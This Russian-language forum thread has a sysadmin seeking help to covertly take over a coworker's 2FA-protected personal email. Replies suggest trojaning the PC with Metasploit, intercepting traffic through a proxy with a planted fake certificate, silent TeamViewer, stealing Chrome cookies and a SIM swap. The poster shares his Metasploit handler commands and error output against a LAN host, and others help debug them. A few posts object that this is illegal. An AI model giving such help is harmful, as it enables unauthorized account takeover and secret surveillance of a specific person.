Добрый день, подскажите пожалуйста куда копать или может направите сразу на готовое решение.

Я сис.админ на работе и есть подозрения что один из сотрудников педофил, был установлен софт для слежения, есть пароль от его личной почты. Т.к. чел параноик( постоянно все за собой подчищает, хотя это не особо ему помогает)

Задача: получить доступ к почте, почта защищена двухфакторной авторизацией (смс). Т.к. он постоянно при отходе от пк чистит все данные браузера, как можно получить доступ к аккаунту?

Были варианты перехватить авторизованные куки когда он полностью залогиниться, но практического опыта в таком нету(знаю только теорию). Так же есть консольный доступ в реальном времени, когда он сидит за пк. Был вариант удаленно завершить браузер и скопировать профиль, но почему то хром в таком случае не переносит куки( возможно я что-то делаю не так)

Посоветуйте решение пожалуйста

Дружище. Легче легкого. Если это рабочий комп затрояньте его метасплоитом. А у него (а точнее у метерпретера) куча модулей. Например:

Ну или вариант второй поставьте ему локально проксю и шлите весь его траффик с почты себе куда нить.

Об этом форкнули сюда мою статью здесь: /threads/449433/

А вообще у сие творческой задачи есть тонна решений.

Ах да самый банальный, тупо teamViewer в Silence режиме.

Благодарю за отклик, статью сейчас изучу, попутно вопрос чем мне поможет teamviewer в silence режиме? ибо он тоже стоит+ стоит vnc-server+я получаю доступ локально через pstools

Intercepter-NG.Если есть доступ к компу,то MITM с установкой заранее фальшивого сертификата.

Очень банальный ответ. Берешь попкорн включаешь vnc и наблюдаешь.

А вот это кстати тоже вариант, но если сравнивать с моими куча заморочек, во - первых почта работает по SSL, то есть тут надо использовать всякие ssl стрипы и так далее, но в целом да, если разобраться тоже способ имеет место быть. Куча вариантов.

а тебе то какая разница?

Похоже он просто решил подсидеть коллегу. Сисадминам часто приходится создавать видимость работы, мол вот поймал за руку сетевого хулигана.

с больной головы, на здоровую? по существу есть что сказать? если нет то мимо

свои дети появятся, поймешь

Нарушение тайны личной переписки, скрытое наблюдение без права на оперативно-розыскную деятельность, и до кучи всего остального.

Ну поймаете вы его, следствию потребуются улики и доказательства. А потом прозвучит весьма неудобный для вас вопрос, а собственно как эти улики были получены? Да и вообще, видимо сейчас в тренде определять преступников по поведению в сети - по репостам, лайкам, параноидальному поведению, скрытному образу жизни. В то время как настоящие маньяки выполняют свою работу на улицах города.

Я не вижу смысла на форуме обсуждать этическую сторону, так же и то, что мне делать с полученными данными. Вы меня лично не знаете и доказывать, что либо я тоже не горю желанием, я только попросил совета как можно получить данные куки и описал условия моего доступа к пк, все остальное не должно иметь никакого значения и как либо влиять на текущую тему. Если у вас есть варианты как можно еще получить куки из хрома,я с удовольствием послушаю, на текущий момент я пробую получить доступ через метерпретер, но что-то сам kali linux не особо горит желанием запускать metasploit

В общем-то уже было:

/posts/4042551/

Тема про пароли, но и для cookies подойдёт. Они также хранятся.

слегка настораживает почему именно нужен доступ к почте, а не к домашнему компьютеру? там наверняка доказательств будут больше.

Интересное занятие. Искать педофилов через электронную почту. Это конечно хорошо, автору +. Но пусть этим занимаются правоохранительные органы.

Таких мразей не только подсиживать нужно.

Будь моя воля то вообще бы колени им ломал..

Можем помочь благому делу. Симкарту под замену и получаем пароль к почте)

По-моему у вас что-то подгорело.

Люди в этой теме делятся на два типа - одни наивно верят тому, что написано (человек верит только тогда, когда хочет верить), а другие объективно оценивают предоставленную информацию и делают выводы.

Спасибо, но пока статус данной личности не понятен. Пробую для начала обойтись менее кардинальными способами, получив доступ к почте через cookie

Для меня это более сложный доступ, сам чел немного, но с компьютером дружит, подкинуть малварь на подключаемый им хдд, думаю не факт что прокатит, поэтому работаю с тем что есть

если кто сталкивался с такой ошибкой:

[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A

подскажите как можно исправить

1) на пк был установлен metsvc.exe (в качестве службы) ставил из этого архива

2) через kali подключаюсь следующим образом:

use exploit/multi/handler

set PAYLOAD windows/metsvc_bind_tcp

set LPORT 31337

set RHOST 192.168.8.116

exploit

[*] Starting the payload handler...

[*] Started bind handler

[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A

^C[-] Exploit failed: Interrupt

Я не очень силён, но, думаю, можно попробовать просто обрубить ему интернет после логина, таким образом не дать разлогиниться.

Пожаловаться на провайдера и т.п.

Или свет обрубить, чтобы вообще ничего не мог почистить.

По крайней мере я вижу решение именно в таком ключе.

Сама ошибка кроется в том, что, первое, иногда не позволяет имя хоста (хост кирилицей или использует символы, которые не понимает OpenSSL). Второе, если вы используете самоподписанный сертификат, то нужно отключить его проверку, её он точно не пройдет --no-check. Третье, попробуйте сменить тип шифрования. (В метасплоите такие штуки обычно в дополнительных опциях (show advanced)). Обновление OpenSSL и Метасплоита тоже может помочь. А ещё не забудьте проверить время что оно правильное.

Для развития можешь почитать тут,может что-то для себя почерпнешь. https://habrahabr.ru/company/neobit/blog/325490/